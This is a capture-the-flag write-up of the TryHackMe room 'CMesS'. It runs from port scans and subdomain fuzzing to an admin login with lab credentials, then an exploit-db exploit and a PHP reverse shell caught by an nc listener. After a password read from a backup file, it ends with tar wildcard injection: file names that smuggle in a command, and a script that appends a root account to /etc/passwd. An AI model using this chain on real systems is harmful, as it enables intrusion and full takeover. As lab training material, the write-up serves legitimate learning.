CMesS
Room Link: https://tryhackme.com/room/cmess
Initial Scan
Kali
nmap -A cmess.thm
Scan all ports
Kali
nmap -sV -sT -O -p 1-65535 cmess.thm
TCP/80 - HTTP
Kali
gobuster dir -u http://cmess.thm -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txtMostly junk
Fuzzing Domains
Fuzzed with a long subdomain list then filtered to reduce the amount of results. Only one stands out, dev.
Kali
wfuzz -c -f sub-fighter -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -u 'http://cmess.thm/' -H "Host: FUZZ.cmess.thm" > results.txt
grep -v '290 W' results.txt
I added dev.cmess.thm to my host file and found this page
We were able to login to the admin portal with these credentials
Username: andre@cmess.thm
Password: KPFTN_f2yxe%Initial Shell
Exploit: https://www.exploit-db.com/raw/51569
The shell they use is bad so I upload a new one to get a reverse shell instead
Shell Link: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
Kali
nc -lvnp 1337
Get autocomplete
python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fgWe find andre's password in a backup file
Victim
cd /opt
ls -lah
cat .password.bak 
TCP/21 - SSH
Kali
ssh andre@$VICTIM
Password: UQfsdCB7aAP6
Privlege Escalation
Exploit: https://gtfobins.github.io/gtfobins/tar/
Victim
cat /etc/crontab
Victim
cd /home/andre/backups
mkdir priv
cd priv
touch ./--checkpoint=1
touch './--checkpoint-action=exec=sh shell.sh'
vi shell.shshell.sh
#!/bin/bash
echo 'new:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash' >> /etc/passwd
Victim
su new
Password: 123
Last updated